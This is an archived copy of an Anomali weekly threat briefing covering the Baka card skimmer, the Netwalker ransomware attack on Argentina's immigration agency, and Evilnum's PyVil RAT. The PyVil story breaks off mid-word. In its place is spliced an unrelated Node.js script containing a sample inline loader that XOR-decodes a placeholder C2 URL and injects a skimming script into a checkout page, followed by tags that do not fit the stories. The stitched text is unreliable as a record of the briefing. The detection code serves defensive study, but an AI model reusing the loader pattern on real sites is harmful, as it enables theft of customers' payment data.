One Article Review

Source: Anomali
Identifier: 2103283
Publication date: 2020-09-09 16:24:00 (viewed: 2020-12-15 21:05:33)
Title: Weekly Threat Briefing: Skimmer, Ransomware, APT Group, and More
Text: The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Baka, DDoS, Netwalker, PyVil, Windows Defender, TA413, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

‘Baka’ Javascript Skimmer Identified (published: September 6, 2020)
Visa has issued a security alert based on the identification of a new skimmer, named “Baka”. Based on analysis by Visa Payment Fraud Disruption, the skimmer appears to be more advanced than earlier skimmers, loading dynamically and using an XOR cipher for obfuscation. The attackers behind Baka inject it into checkout pages using a script tag; the skimming code is downloaded from the Command and Control (C2) server and executed in memory to steal customer data.
Recommendation: eCommerce site owners must take every step necessary to secure their data and safeguard their customers' payment card information. Visa has also released best practices in the security advisory.
Tags: Baka, Javascript, Skimmer

Netwalker Ransomware Hits Argentinian Government, Demands $4 Million (published: September 6, 2020)
The Argentinian immigration agency, Dirección Nacional de Migraciones, suffered a ransomware attack that shut down border crossings. After receiving many tech support calls, the computer networks were shut down to prevent further spread of the ransomware, which led to a cessation of border crossings until systems were up again. The ransomware used in this attack is Netwalker, which left a ransom note initially demanding $2 million; when this wasn't paid in the first week, the ransom increased to $4 million.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different media, with 1 off-site. In the case of a ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Argentina, Government, Netwalker, Ransomware

No Rest for the Wicked: Evilnum Unleashes PyVil RAT (published: September 3, 2020)
Researchers on the Cybereason Nocturnus team have published their research tracking the threat actor group known as Evilnum and an ongoing change in its tooling and attack procedures. This includes a new Remote Access Trojan (RAT), written in Python, that the group has begun to use. The group attacks targets in the financial services sector using highly targeted spearphishing. The phishing lures leverage "Know Your Customer" (KY
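The Baka loader pattern above (XOR-obfuscated strings, a script tag injected into the checkout page, payload fetched from a C2 and executed in memory) is worth being able to both recognise and unpick. The following Node.js script is an added example, not code from Anomali, Visa or the Baka actors: it shows the single-byte XOR obfuscation the briefing describes, recovers the hidden URL from a captured loader, and runs a first-pass audit of a checkout page for the injection pattern (script tags sourced from hosts outside an allowlist, and inline loaders that decode a string and create a script element). The allowlist hostnames, the sample page HTML and the C2 URL are constructed for illustration and are not real indicators.

```javascript
// Added example, not code from Anomali or Visa. Shows the XOR string
// obfuscation the briefing attributes to the Baka loader, recovers the hidden
// URL from a captured loader, and audits a checkout page for the injection
// pattern. Hostnames, the page HTML and the C2 URL below are constructed.

// Single-byte XOR over a string: the same routine obfuscates and deobfuscates.
function xorCipher(text, key) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key);
  }
  return out;
}

// Hex-encode a string so an XORed payload can sit safely inside a script literal.
function toHex(text) {
  return Array.from(text, c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Defender side: turn a captured hex blob and key back into the plaintext URL.
function decodeHexXor(hex, key) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// Hostnames a checkout page may legitimately load scripts from (assumed:
// the shop's own domain and its payment provider).
const SCRIPT_ALLOWLIST = new Set(["shop.example", "js.payment-provider.example"]);

// Pull every <script> tag out of the HTML with its src attribute and inline body.
function extractScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const scripts = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Heuristic for an in-memory XOR loader: a decode loop (fromCharCode plus the
// ^ operator) feeding eval/Function or a dynamically created script element.
function looksLikeXorLoader(body) {
  return /fromCharCode/.test(body) && /\^/.test(body) &&
    /\b(eval|Function)\s*\(|createElement\s*\(\s*["']script["']\s*\)/.test(body);
}

// Report scripts sourced from hosts outside the allowlist and inline loaders.
function auditCheckoutPage(html, allowlist = SCRIPT_ALLOWLIST) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      let host = null;
      try { host = new URL(s.src, "https://shop.example/").hostname; } catch (e) {}
      if (host === null || !allowlist.has(host)) {
        findings.push({ kind: "unexpected-src", detail: s.src });
      }
    } else if (looksLikeXorLoader(s.body)) {
      findings.push({ kind: "xor-loader", detail: s.body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample: a checkout page with two legitimate scripts, one script
// from an unknown CDN host, and an inline loader that XOR-decodes a C2 URL
// and injects it as a new script tag. The URL is a placeholder, not a real IOC.
const KEY = 0x2a;
const HIDDEN_URL = toHex(xorCipher("https://c2.invalid/skim.js", KEY));
const SAMPLE_CHECKOUT_HTML = `<html><body>
<script src="https://shop.example/checkout.js"></script>
<script src="https://js.payment-provider.example/sdk.js"></script>
<script src="//cdn.unknown-host.invalid/jquery.min.js"></script>
<script>
var h="${HIDDEN_URL}",k=${KEY},d="";
for(var i=0;i<h.length;i+=2){d+=String.fromCharCode(parseInt(h.slice(i,i+2),16)^k);}
var e=document.createElement("script");e.src=d;document.head.appendChild(e);
</script>
</body></html>`;

console.log(auditCheckoutPage(SAMPLE_CHECKOUT_HTML));
console.log("hidden URL:", decodeHexXor(HIDDEN_URL, KEY));
```

Run it with `node` against a saved copy of your own checkout page by swapping the sample HTML for the file contents and the allowlist for your real script origins. The heuristics are deliberately simple: a loader that splits its decode across helper functions, or that uses a different encoding, will slip past the inline check, so treat the output as a triage list to compare against the IOCs attached to the briefing, not as a verdict.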
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Medical
Stories: APT 38, APT 28
Rating: ★★★★


The article does not appear to have been picked up after its publication.


The article does not appear to be a repeat of an earlier one.